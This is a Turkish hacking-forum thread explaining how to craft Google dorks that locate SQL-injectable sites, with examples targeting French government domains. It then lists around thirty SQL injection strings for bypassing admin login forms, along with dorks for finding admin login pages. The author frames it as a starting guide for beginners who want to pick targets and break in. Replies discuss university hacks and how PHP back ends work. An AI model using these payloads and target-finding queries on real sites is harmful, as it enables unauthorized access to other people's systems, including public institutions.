Sql Dork Ve Login Sql Bypass

ubermensch

Üye
16 Eki 2020
70
0
WHITE HOUSE


SQL DORK VE LOGİN SQL BYPASS




SQL DORK

Sql hatası alabileceğimiz sitelere ulaşmak için dork Oluşturma.




1.(inurl:...)

inurl:'dan sonra, sitenin içinde bulunmasını istediğimiz kelimyei yazabiliriz. Hangi dilde yazarsak kelimeyi büyük bir ihtimal o dili kullanan milletlerin oluşturduğu sitelerle karşılaşırız.
Kod:
inurl:école
école(Fransızca okul)




2.(.php? - .asp? - .aspx)

Kelimenin yanına sunucu dili uzantısı(.php? - .asp? - .aspx) eklenilebilir.
Kod:
inurl:école.php?




3.(id=)

En sona "id=" değerini ekliyebiliriz.
Kod:
inurl:école.php?id=




4.(site:...)

Dorku daha da özelleşirebiliriz, site:'dan sonra ülke uzantısı yazarak belirttiğimiz ülkenin sitelerine oluşabiliriz.
Kod:
inurl:école.php?id= site:.fr
(.fr Fransa'nın uzantısıdır, kelime Fransızca olduğu için uzantıyı da Fransa yapmak daha mantıklıdır.)

ulkekodlar.jpg




5.(Web Uzantısı)

Dorku özelleştiriken web uzantısını da belirtebiliriz.
Kod:
inurl:école.php?id= .gov  (.gov uzantısını devlet siteleri kullanır.)

uzantionecikan-640x366.jpg




6.(Ülke uzantısı + Web sitesi uzantısı)

Hedef ülekinin uzantısı ile web uzantılarını beraber kullabiliriz.
Kod:
inurl:école.php?id= .gov.fr
(Bu dork Fransa'nın devlet sitelerine ulaşabileceğimiz bir dork.)










LOGİN SQL BYPASS



Bypass: Alternatif yolları kullanarak asıl yolu atlatmaktır.


Admin Panel girişte kullanacağımız bypass edici kodları ile admin panele girbiliriz. Bu açık her sitede mevcut değildir ancak login sql bypass'ı denediğinizde farkına varacaksınız ki bir çok yerde bu bypass edici kodlar ile admin panele giriş yapabileceksiniz.




Bypass edici Kodları:

Kod:
''Or'='Or''
anything' OR 'x'='x
1'or'1'='1
' or 1=1 or ''='
" or 1=1 or ""="
' OR ''='
'' OR ''=''
'OR''='
hey' or 1=1–
''Or 1 = 1'
' or 1=1--
or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
hi") or ("a"="a
'hi' or 'x'='x';
x' or 1=1 or 'x'='y
\x27\x4F\x52 SELECT *
\x27\x6F\x72 SELECT *
'or select *
admin'--
")) or (("x"))=(("x
" or ""+"
admin"or 1=1 or ""="
admin") or ("1"="1"—


Username ve Password'u bu bypass edici kodları kullanarak geçebiliriz.



Login Sql Bypass dorkaları: (Bunları kendinize göre özelleştirebilirsiniz.)


Kod:
İnurl:admin/login.php
İnurl:admin/login.asp
İnurl:admin/login.aspx

İnurl:login.php
İnurl:login.asp
İnurl:login.aspx

İnurl:admin/index.php
İnurl:admin/index.asp
İnurl:admin/index.aspx

İnurl:administrator.php
İnurl:administrator.asp
İnurl:administrator.aspx

İnurl:adminlogin.php
İnurl:adminlogin.asp
İnurl:adminlogin.aspx












Sql İnjection'ı da anlattım bundan sonra onu okumanız, öğrenmek ve öğrendiklerinizi uygulayabilmek açısından daha yararlı olacaktır:https://www.turkhackteam.org/web-se...63239-manuel-sql-injection.html#post9291135







 
Son düzenleme:

gl0balfox

Üye
9 Tem 2019
228
0
Ben Anka Underground hedef belirledikten sonra back-endi okuyup 0day buluyor sanıyordum, hacklenen üniversiteler Google'a dork yazıp önüne gelen siteye SQL denenerek mi hackleniyordu?
 

x4807

Katılımcı Üye
10 Ağu 2019
985
17
Ben Anka Underground hedef belirledikten sonra back-endi okuyup 0day buluyor sanıyordum, hacklenen üniversiteler Google'a dork yazıp önüne gelen siteye SQL denenerek mi hackleniyordu?

Bir sitenin back-end kaynak kodlarını okunamaz. Kaynak kodlarını açtığında gördüğün front-end kısmı olur o da html, css ve varsa js onları görebilirsin. Ancak php üzerinden back-end'i şöyle özetleyebilirim sana;

<?php
echo "<p>Merhaba gl0balfox...</p>";
?>
böyle bir kodumuz olsun. Ben bunu alayım gl0balfox.php olarak kaydedeyim. Sitede bir şekilde herhangi bir kullanıcı gl0balfox.php'ye geldiğinde sunucu bu isteği alır, php processor'a gönderir. Php processor bunu alır, yükler. Çıktı aşağıdaki gibi olur;

<p>Merhaba globalfox...</p>
Ardından bu html kod parçası tarayıcıya geri gönderilir ve tarayıcı bunu işler. İşleyince de sana aşağıdaki gibi gelir;

Merhaba gl0balfox...
2. bahsettiğin duruma ise yorum yapmak istemiyorum :D
 

ubermensch

Üye
16 Eki 2020
70
0
WHITE HOUSE
Elinize sağlık hocam.
..Sağ olun Anja.

Ben Anka Underground hedef belirledikten sonra back-endi okuyup 0day buluyor sanıyordum, hacklenen üniversiteler Google'a dork yazıp önüne gelen siteye SQL denenerek mi hackleniyordu?


Yeni başlayan birinin hedef site üzerinde açık arayıp, bulup ve sömürmesi biraz zordur. Bu konu bu alanda çalışmalara yeni başlayan kişilere yol göstermek amacı ile yazılmıştır.

Dork ile hedef belirlenir, inurl:.php?id= .gov.fr ise dorkun hedefinde Fransa devlet siteleri vardır.

SQL açığını hafife alma, bir açığı etkili olması o açık ile sömürmeye çalışan kişinin hayal gücü ve zihin becerisine bağlıdır.



Eline Sağlık, başarılı bir konu olmuş.
Sağ olun Jaime Lannister.

eline emeğine sağlık :)
Sağ olun Winston Bey.
 
Moderatör tarafında düzenlendi:
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.